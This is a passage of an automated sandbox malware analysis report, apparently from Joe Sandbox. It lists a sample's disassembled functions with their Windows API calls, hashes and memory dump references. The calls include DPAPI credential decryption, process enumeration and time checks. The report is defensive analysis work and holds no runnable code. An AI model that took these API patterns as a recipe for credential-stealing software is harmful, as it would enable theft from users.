                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: BinaryCryptLocalString$AllocFree
                        • String ID: Nm
                        • API String ID: 4291131564-3116952562
                        • Opcode ID: f99107f948422b7d0bc6627bff33d2e1af9cd6ff78529e81a4d13687fa7f010c
                        • Instruction ID: b09af947e209eed76eb475464ceec311492c4fa10a5632517651e5ef23aab672
                        • Opcode Fuzzy Hash: f99107f948422b7d0bc6627bff33d2e1af9cd6ff78529e81a4d13687fa7f010c
                        • Instruction Fuzzy Hash: 2311D2B4741208AFEB00CF64CC95FAA77B5FB89704F208089F9159B390C7B2AD01DBA0
                        Function 00AA4445 Relevance: 7.8, Strings: 5, Instructions: 1562COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 2"+s$E#o$Qsy$RK$$ow
                        • API String ID: 0-211963892
                        • Opcode ID: a34e90904763a471caeaca77998389a024f5d78db0d8353f4b3a243416dcba40
                        • Instruction ID: a88803bc89d8fd48dd161b64087bb2dbb54f4f0b1f858aa9a875bae110d59a17
                        • Opcode Fuzzy Hash: a34e90904763a471caeaca77998389a024f5d78db0d8353f4b3a243416dcba40
                        • Instruction Fuzzy Hash: 5BB225F36082009FE3046E2DDC8567AF7E5EF94720F1A4A3DEAC4C7744EA3598058697
                        Function 006DC820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                        Download Yara Rule
                        APIs
                        • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 006DC871
                        • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 006DC87C
                        • lstrcat.KERNEL32(?,006F0B46), ref: 006DC943
                        • lstrcat.KERNEL32(?,006F0B47), ref: 006DC957
                        • lstrcat.KERNEL32(?,006F0B4E), ref: 006DC978
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$BinaryCryptStringlstrlen
                        • String ID:
                        • API String ID: 189259977-0
                        • Opcode ID: c4d8f6ab26dca4f3dcbc2de99147601995f923ef8d570e5a90f73d3dfc819762
                        • Instruction ID: d9ce0c1a490cfca6fa8136f4a9886b61ee0bae075f5dae06af69d37b6c3db5e1
                        • Opcode Fuzzy Hash: c4d8f6ab26dca4f3dcbc2de99147601995f923ef8d570e5a90f73d3dfc819762
                        • Instruction Fuzzy Hash: 8A416D75E1421EDBDB10DFA0CD89BFEB7B9BB48304F1081A8E509A6280D7745A85DF91
                        Function 006E6920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                        Download Yara Rule
                        APIs
                        • GetSystemTime.KERNEL32(?), ref: 006E696C
                        • sscanf.NTDLL ref: 006E6999
                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 006E69B2
                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 006E69C0
                        • ExitProcess.KERNEL32 ref: 006E69DA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Time$System$File$ExitProcesssscanf
                        • String ID:
                        • API String ID: 2533653975-0
                        • Opcode ID: d6fa9d02a6147282cd1d2cde891ce7c1ad5ce408777090e5c3337ab602e4589d
                        • Instruction ID: 645bc2b7067ece9187769d7595f13df3967849d84d1674696d19045919b9a266
                        • Opcode Fuzzy Hash: d6fa9d02a6147282cd1d2cde891ce7c1ad5ce408777090e5c3337ab602e4589d
                        • Instruction Fuzzy Hash: 3F21EB75D15209ABCF04EFE4D9459EEB7B6BF48300F04856EE406E3250EB345605CB69
                        Function 006D7240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000008,00000400), ref: 006D724D
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006D7254
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 006D7281
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 006D72A4
                        • LocalFree.KERNEL32(?), ref: 006D72AE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                        • String ID:
                        • API String ID: 2609814428-0
                        • Opcode ID: 8bc735220a54d70b7b559c61cb1c4b1a47dfeef873f57ce14c96c07760a5b7c3
                        • Instruction ID: 6b381b59dc27a698d45430495ad75ed8dc448f52725486c11c8987465875de8c
                        • Opcode Fuzzy Hash: 8bc735220a54d70b7b559c61cb1c4b1a47dfeef873f57ce14c96c07760a5b7c3
                        • Instruction Fuzzy Hash: AC014071B45208BBEB10DFD8CD45FEE7778AB44700F108145FB05AA2C0D670AA00DB65
                        Function 006E9600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                        Download Yara Rule
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 006E961E
                        • Process32First.KERNEL32(006F0ACA,00000128), ref: 006E9632
                        • Process32Next.KERNEL32(006F0ACA,00000128), ref: 006E9647
                        • StrCmpCA.SHLWAPI(?,00000000), ref: 006E965C
                        • CloseHandle.KERNEL32(006F0ACA), ref: 006E967A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                        • String ID:
                        • API String ID: 420147892-0
                        • Opcode ID: 84eaf045f562fdb9b8af7a74fb2453188643ae33f12561a0c6d24d3ba930e4ae
                        • Instruction ID: 9a82e4b4a8efabe2db0dada6cf18e1434d98fc1ae9faf1896a9da8b09770c54e
                        • Opcode Fuzzy Hash: 84eaf045f562fdb9b8af7a74fb2453188643ae33f12561a0c6d24d3ba930e4ae
                        • Instruction Fuzzy Hash: 33010C75A15308ABDB15DFA5CD48BEDB7F9EF48300F108199A90596290D7349F40DF61
                        Function 0097D447 Relevance: 6.5, Strings: 5, Instructions: 210COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: Uz{$iF7$#;$<}}$<}}
                        • API String ID: 0-2722849775
                        • Opcode ID: ce04776913d1428fb92eb16519f04b4a365c25aa5a4a49e99cdd7b3740ed0f5d
                        • Instruction ID: d3f84ab312a017f9e7264c902ed2649e1dff498843169dc3d356623c728ea6e5
                        • Opcode Fuzzy Hash: ce04776913d1428fb92eb16519f04b4a365c25aa5a4a49e99cdd7b3740ed0f5d
                        • Instruction Fuzzy Hash: 2861D3B39083109BE3146A38EC8577ABBE4EF54320F1B4A3DEAD997780E9755D408787
                        Function 006E8EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                        Download Yara Rule
                        APIs
                        • CryptBinaryToStringA.CRYPT32(00000000,006D5184,40000001,00000000,00000000,?,006D5184), ref: 006E8EC0
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: BinaryCryptString
                        • String ID:
                        • API String ID: 80407269-0
                        • Opcode ID: 9808c17d4ac281a4591a594ee132a1f010f317bb9660b8a0d003c315a889c406
                        • Instruction ID: f1b742474e632744b554cde17b898c182e66656d56f3f943982f7727eafc2026
                        • Opcode Fuzzy Hash: 9808c17d4ac281a4591a594ee132a1f010f317bb9660b8a0d003c315a889c406
                        • Instruction Fuzzy Hash: AD111870205388BFDB00CF65E884FAB37AAAF89340F109548F9198B251DB35EC41EB60
                        Function 006E7A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00E4E608,00000000,?,006F0E10,00000000,?,00000000,00000000), ref: 006E7A63
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006E7A6A
                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00E4E608,00000000,?,006F0E10,00000000,?,00000000,00000000,?), ref: 006E7A7D
                        • wsprintfA.USER32 ref: 006E7AB7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                        • String ID:
                        • API String ID: 3317088062-0
                        • Opcode ID: a3de4fc330f58dc78dbc7d9896fdc4673bdcc9876c1de102783956a9f447395e
                        • Instruction ID: cd89a6e73440a559e75105ed1f82e064792874447a859c0e247c933fb7f0c8e6
                        • Opcode Fuzzy Hash: a3de4fc330f58dc78dbc7d9896fdc4673bdcc9876c1de102783956a9f447395e
                        • Instruction Fuzzy Hash: 2C117CB1A4A218EBEB208B59DC49FA9B778FB04721F1043EAE91A93280D7741E40CB51
                        Function 00A98804 Relevance: 5.4, Strings: 3, Instructions: 1652COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: CIm7$_?$hos
                        • API String ID: 0-3641775013
                        • Opcode ID: 680050c52c734e626fd7da9ef63ef5540fc519e3e5b154bb6e99f9a31fddbe81
                        • Instruction ID: e8007252c7a745873017824298094f9b09b15b42e1643b432962aa774a73abae
                        • Opcode Fuzzy Hash: 680050c52c734e626fd7da9ef63ef5540fc519e3e5b154bb6e99f9a31fddbe81
                        • Instruction Fuzzy Hash: E8B208F360C2009FE704AE2DEC8567ABBE6EF94320F16453DEAC5C7744EA3598058697
                        Function 006E3720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                        Download Yara Rule
                        APIs
                        • CoCreateInstance.COMBASE(006EE118,00000000,00000001,006EE108,00000000), ref: 006E3758
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 006E37B0
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharCreateInstanceMultiWide
                        • String ID:
                        • API String ID: 123533781-0
                        • Opcode ID: 105f133939a7fa42a7f64b21428b9ece6ca8c30d70bc0e59de3d6ec15c91495c
                        • Instruction ID: bbfd77ac55f56e8161cdfe0eaa1c8ef514fc375e7a0a7df0213ca624f1196172
                        • Opcode Fuzzy Hash: 105f133939a7fa42a7f64b21428b9ece6ca8c30d70bc0e59de3d6ec15c91495c
                        • Instruction Fuzzy Hash: F141C670A40A289FDB24DB58CC99B9BB7B5BB48702F4091D8A609A72D0E7716E85CF50
                        Function 006D9B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                        Download Yara Rule
                        APIs
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 006D9B84
                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 006D9BA3
                        • LocalFree.KERNEL32(?), ref: 006D9BD3
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
